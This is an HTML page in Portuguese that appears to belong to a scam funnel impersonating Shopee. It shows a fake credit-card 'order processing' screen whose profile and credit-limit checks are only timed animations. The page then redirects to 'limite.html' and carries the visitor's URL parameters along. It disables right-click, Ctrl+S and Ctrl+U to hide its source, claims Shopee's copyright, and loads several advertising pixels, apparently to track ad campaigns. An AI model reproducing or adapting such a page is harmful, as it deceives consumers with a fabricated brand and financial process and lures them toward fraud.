<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Processamento do Pedido</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f9f9f9;
            color: #333;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        .header {
            background-color: white;
            padding: 15px 0;
            text-align: center;
            font-size: 1.5rem;
            font-weight: bold;
            border-bottom: 3px solid #ee4d2d;
        }

        .header img {
            width: 120px;
        }

        .main-content {
            max-width: 600px;
            background: #fff;
            margin: 40px auto;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 4px 15px rgba(0, 0, 0, 0.1);
            text-align: center;
        }

        .progress-bar-container {
            width: 100%;
            height: 5px;
            background-color: #e6e6e6;
            border-radius: 5px;
            margin-top: 10px;
            overflow: hidden;
            position: relative;
        }

        .progress-bar {
            width: 0;
            height: 100%;
            background-color: #6c63ff;
            transition: width 1s ease-in-out;
        }

        .progress-list {
            list-style: none;
            padding: 0;
            margin: 20px 0;
            text-align: left;
        }

        .progress-list li {
            display: flex;
            align-items: center;
            font-size: 14px;
            margin-bottom: 10px;
            color: #333;
            opacity: 0;
            transition: opacity 0.5s ease-in-out;
        }

        .progress-list li img {
            width: 20px;
            height: 20px;
            margin-right: 10px;
        }

     .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
    }

        /* Cont&ecirc;iner principal do cart&atilde;o */
        .cartao-container {
            position: relative;
            display: inline-block;
        }

        /* Estilo do cart&atilde;o */
        .cartao {
            width: var(--cartao-width, 350px);
            height: var(--cartao-height, 200px);
            border-radius: 15px;
            background: #ee4d2d;
            color: white;
            padding: 20px;
            display: flex;
            flex-direction: column;
            justify-content: flex-start;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.3);
            font-family: Arial, sans-serif;
            position: relative;
            overflow: hidden;
        }

        /* &aacute;rea para imagem substituindo o chip */
        .imagem-chip {
            width: 50px;
            height: auto; /* Manter propor&ccedil;&atilde;o da imagem */
            position: absolute;
            top: 40%; /* Centralizar verticalmente na altura do cart&atilde;o */
            left: %; /* Posi&ccedil;&atilde;o t&iacute;pica na parte esquerda */
            transform: translateY(-50%); /* Ajustar para centraliza&ccedil;&atilde;o precisa */
        }

        /* &aacute;rea para imagem adicional no canto superior direito */
        .imagem-adicional {
            width: 30px;
            height: auto; /* Manter propor&ccedil;&atilde;o da imagem */
            position: absolute;
            top: 10px; /* Posi&ccedil;&atilde;o fixa no canto superior direito */
            right: 10px; /* Posi&ccedil;&atilde;o fixa no canto superior direito */
      
        }

        /* &aacute;rea para imagem adicional no canto superior direito */
        .imagem-adicional-3 {
            width: 100px;
            height: auto; /* Manter propor&ccedil;&atilde;o da imagem */
            position: absolute;
            top: 150px; /* Posi&ccedil;&atilde;o fixa no canto superior direito */
            right: 235px; /* Posi&ccedil;&atilde;o fixa no canto superior direito */
      
        }

        /* &aacute;rea para imagem adicional no canto superior direito */
        .imagem-adicional-2 {
            width: 100px;
            height: auto; /* Manter propor&ccedil;&atilde;o da imagem */
            position: absolute;
            top: 146px; /* Posi&ccedil;&atilde;o fixa no canto superior direito */
            right: 10px; /* Posi&ccedil;&atilde;o fixa no canto superior direito */
            
        }
      
        /* Texto do cart&atilde;o ("Cart&atilde;o de Cr&eacute;dito") */
        .texto {
            font-size: var(--texto-size, 20px); /* Tamanho ajust&aacute;vel */
            color: var(--texto-color, white); /* Cor ajust&aacute;vel */
            font-weight: bold;
            position: absolute;
            top: 15px; /* Posi&ccedil;&atilde;o fixa no canto superior esquerdo */
            left: 20px; /* Posi&ccedil;&atilde;o fixa no canto superior esquerdo */
        }

        /* Barra de progresso */
        .barra-progresso {
            width: var(--barra-width, calc(100% - 40px)); /* Largura ajust&aacute;vel */
            height: 10px;
            background-color: rgba(255, 255, 255, 0.3);
            border-radius: 5px;
            overflow: hidden;
            position: absolute;
            top: var(--barra-top, 120px); /* Posi&ccedil;&atilde;o vertical ajust&aacute;vel */
            left: 20px; /* Posi&ccedil;&atilde;o horizontal fixa */
        }

        .barra-progresso .progresso {
            width: 100%;
            height: 100%;
            background-color: white;
            position: absolute;
            left: -100%;
            animation: progresso-loop 2s linear infinite;
        }

        /* Anima&ccedil;&atilde;o da barra de progresso */
        @keyframes progresso-loop {
            0% {
                left: -100%;
            }
            100% {
                left: 100%;
            }
        }
    </style>
</head>
    </style>
</head>
<script>
if (document.addEventListener) {
    document.addEventListener("keydown", bloquearSource);
} else { //Vers&otilde;es antigas do IE
    document.attachEvent("onkeydown", bloquearSource);
}

function bloquearSource(e) {
    e = e || window.event;

    var code = e.which || e.keyCode;

    if (
        e.ctrlKey &&
        (code == 83 || code == 85) //83 = S, 85 = U
    ) {
        if (e.preventDefault) {
            e.preventDefault();
        } else {
            e.returnValue = false;
        }

        return false;
    }
}
</script>
<style>
/*desabilita a sele&ccedil;&atilde;o no body*/
body {
    -webkit-touch-callout: none; /* iOS Safari */
      -webkit-user-select: none; /* Chrome/Safari/Opera */
       -khtml-user-select: none; /* Konqueror */
         -moz-user-select: none; /* Firefox */
          -ms-user-select: none; /* Internet Explorer/Edge */
              user-select: none;
}

/*habilita a sele&ccedil;&atilde;o nos campos editaveis*/
input, textarea {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: text; /* Chrome/Safari/Opera */
       -khtml-user-select: text; /* Konqueror */
         -moz-user-select: text; /* Firefox */
          -ms-user-select: text; /* Internet Explorer/Edge */
              user-select: text;
}

/*habilita a sele&ccedil;&atilde;o nos campos com o atributo contenteditable*/
[contenteditable=true] {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: all; /* Chrome/Safari/Opera */
       -khtml-user-select: all; /* Konqueror */
         -moz-user-select: all; /* Firefox */
          -ms-user-select: all; /* Internet Explorer/Edge */
              user-select: all;
}
</style>

<script>
if (document.addEventListener) {
    document.addEventListener("contextmenu", function(e) {
        e.preventDefault();
        return false;
    });
} else { //Vers&otilde;es antigas do IE
    document.attachEvent("oncontextmenu", function(e) {
        e = e || window.event;
        e.returnValue = false;
        return false;
    });
}
</script>

<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=AW-16692136603"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'AW-16692136603');
</script>

<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '729713382581372');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=729713382581372&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->

<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '458826036468090');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=458826036468090&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->

<!-- TikTok Pixel Code Start -->
<script>
!function (w, d, t) {
  w.TiktokAnalyticsObject=t;var ttq=w[t]=w[t]||[];ttq.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie","holdConsent","revokeConsent","grantConsent"],ttq.setAndDefer=function(t,e){t[e]=function(){t.push([e].concat(Array.prototype.slice.call(arguments,0)))}};for(var i=0;i<ttq.methods.length;i++)ttq.setAndDefer(ttq,ttq.methods[i]);ttq.instance=function(t){for(
var e=ttq._i[t]||[],n=0;n<ttq.methods.length;n++)ttq.setAndDefer(e,ttq.methods[n]);return e},ttq.load=function(e,n){var r="https://analytics.tiktok.com/i18n/pixel/events.js",o=n&&n.partner;ttq._i=ttq._i||{},ttq._i[e]=[],ttq._i[e]._u=r,ttq._t=ttq._t||{},ttq._t[e]=+new Date,ttq._o=ttq._o||{},ttq._o[e]=n||{};n=document.createElement("script")
;n.type="text/javascript",n.async=!0,n.src=r+"?sdkid="+e+"&lib="+t;e=document.getElementsByTagName("script")[0];e.parentNode.insertBefore(n,e)};


  ttq.load('CR88BSBC77U42T4DV7H0');
  ttq.page();
}(window, document, 'ttq');
</script>
<!-- TikTok Pixel Code End -->

<script>
!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.install=t():e.install=t()}(window,(function(){return function(e){var t={};function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{}};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.d=function(e,t,o){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:o})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(o,r,function(t){return e[t]}.bind(null,r));return o},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";var o=this&&this.__spreadArray||function(e,t,n){if(n||2===arguments.length)for(var o,r=0,i=t.length;r<i;r++)!o&&r in t||(o||(o=Array.prototype.slice.call(t,0,r)),o[r]=t[r]);return e.concat(o||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0});var r=function(e,t,n){var o,i=e.createElement("script");i.type="text/javascript",i.async=!0,i.src=t,n&&(i.onerror=function(){r(e,n)});var a=e.getElementsByTagName("script")[0];null===(o=a.parentNode)||void 0===o||o.insertBefore(i,a)};!function(e,t,n){e.KwaiAnalyticsObject=n;var i=e[n]=e[n]||[];i.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"];var a=function(e,t){e[t]=function(){for(var n=[],r=0;r<arguments.length;r++)n[r]=arguments[r];var i=o([t],n,!0);e.push(i)}};i.methods.forEach((function(e){a(i,e)})),i.instance=function(e){var t,n=(null===(t=i._i)||void 0===t?void 0:t[e])||[];return i.methods.forEach((function(e){a(n,e)})),n},i.load=function(e,o){var a="https://s1.kwai.net/kos/s101/nlav11187/pixel/events.js";i._i=i._i||{},i._i[e]=[],i._i[e]._u=a,i._t=i._t||{},i._t[e]=+new Date,i._o=i._o||{},i._o[e]=o||{};var c="?sdkid=".concat(e,"&lib=").concat(n);r(t,a+c,"https://s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js"+c)}}(window,document,"kwaiq")}])}));
</script>
<script>
kwaiq.load('510449167530721283');
kwaiq.page();
</script>

<script>
!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.install=t():e.install=t()}(window,(function(){return function(e){var t={};function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{}};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.d=function(e,t,o){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:o})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(o,r,function(t){return e[t]}.bind(null,r));return o},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";var o=this&&this.__spreadArray||function(e,t,n){if(n||2===arguments.length)for(var o,r=0,i=t.length;r<i;r++)!o&&r in t||(o||(o=Array.prototype.slice.call(t,0,r)),o[r]=t[r]);return e.concat(o||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0});var r=function(e,t,n){var o,i=e.createElement("script");i.type="text/javascript",i.async=!0,i.src=t,n&&(i.onerror=function(){r(e,n)});var a=e.getElementsByTagName("script")[0];null===(o=a.parentNode)||void 0===o||o.insertBefore(i,a)};!function(e,t,n){e.KwaiAnalyticsObject=n;var i=e[n]=e[n]||[];i.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"];var a=function(e,t){e[t]=function(){for(var n=[],r=0;r<arguments.length;r++)n[r]=arguments[r];var i=o([t],n,!0);e.push(i)}};i.methods.forEach((function(e){a(i,e)})),i.instance=function(e){var t,n=(null===(t=i._i)||void 0===t?void 0:t[e])||[];return i.methods.forEach((function(e){a(n,e)})),n},i.load=function(e,o){var a="https://s1.kwai.net/kos/s101/nlav11187/pixel/events.js";i._i=i._i||{},i._i[e]=[],i._i[e]._u=a,i._t=i._t||{},i._t[e]=+new Date,i._o=i._o||{},i._o[e]=o||{};var c="?sdkid=".concat(e,"&lib=").concat(n);r(t,a+c,"https://s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js"+c)}}(window,document,"kwaiq")}])}));
</script>
<script>
kwaiq.load('261106540113615');
kwaiq.page();
</script><body>
    <!-- Header -->
    <div class="header">
        <img src="https://logodownload.org/wp-content/uploads/2021/03/shopee-logo.png" alt="YES Card">
    </div>

    <!-- Main Content -->
    <div class="main-content">
        <p>Aguarde enquanto processamos seu pedido</p>
        
        <body>
    <div class="cartao-container">
        <div class="cartao">
            <!-- Substitui&ccedil;&atilde;o do chip por uma imagem -->
            <img src="https://cdn.freebiesupply.com/logos/large/2x/chip-1-logo-png-transparent.png" alt="Chip do Cart&atilde;o" class="imagem-chip">

            <!-- Imagem adicional no canto superior direito -->
            <img src="https://i.ibb.co/mG9n8wp/Design-sem-nome.png" alt="Imagem adicional" class="imagem-adicional">
            
            <!-- Imagem adicional-2 no canto superior direito -->
            <img src="https://i.ibb.co/JsmcJQf/Bank.png" alt="Imagem adicional-2" class="imagem-adicional-2">
          
           <!-- Imagem adicional-3 no canto superior direito -->
            <img src="https://i0.wp.com/americassbdc.org/wp-content/uploads/2021/05/Visa-logo-white.png?fit=900%2C291&ssl=1" alt="Imagem adicional-3" class="imagem-adicional-3">

            <!-- Texto do cart&atilde;o -->
            <div class="texto">Cart&atilde;o de Cr&eacute;dito</div>

            <!-- Barra de progresso -->
            <div class="barra-progresso">
                <div class="progresso"></div>
            </div>
        </div>
    </div>
</body>
        
        <!-- A &aacute;rea para o cart&atilde;o foi removida -->
        <ul class="progress-list">
            <li id="step-1">
                <img src="https://cdn.pixabay.com/animation/2023/08/11/21/18/21-18-05-265_512.gif" alt="Carregando...">
                Aguardando resposta do sistema...
            </li>
            <li id="step-2">
                <img src="https://cdn.pixabay.com/animation/2023/08/11/21/18/21-18-05-265_512.gif" alt="Carregando...">
                Analisando seu perfil...
            </li>
            <li id="step-3">
                <img src="https://cdn.pixabay.com/animation/2023/08/11/21/18/21-18-05-265_512.gif" alt="Carregando...">
                Verificando limite dispon&iacute;vel...
            </li>
            <li id="step-4">
                <img src="https://cdn.pixabay.com/animation/2023/08/11/21/18/21-18-05-265_512.gif" alt="Carregando...">
                Preparando seu cart&atilde;o...
            </li>
            <li id="step-5">
                <img src="https://cdn.pixabay.com/animation/2023/08/11/21/18/21-18-05-265_512.gif" alt="Carregando...">
                Finalizando solicita&ccedil;&atilde;o...
            </li>
        </ul>
    </div>

    <!-- Script -->
    <script>
        function showStepsWithDelay() {
            const steps = document.querySelectorAll('.progress-list li');
            steps.forEach((step, index) => {
                setTimeout(() => {
                    step.style.opacity = 1;
                }, index * 1000);
            });

            // Redireciona ap�s o &uacute;ltimo passo
            setTimeout(() => {
                const currentUrl = new URL(window.location.href);

                const queryParams = currentUrl.search;

                window.location.href = 'limite.html' + queryParams;
            }, steps.length * 1000);
        }

        // Inicia a exibi&ccedil;&atilde;o das etapas ap�s carregar a p&aacute;gina
        document.addEventListener('DOMContentLoaded', showStepsWithDelay);
    </script>

    <!-- Footer -->
    <div class="footer">
Copyright &copy; 2025 Shopee. Todos os direitos reservados.<br>

Pol&iacute;tica de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa do Site
    </div>

</body>
</html>
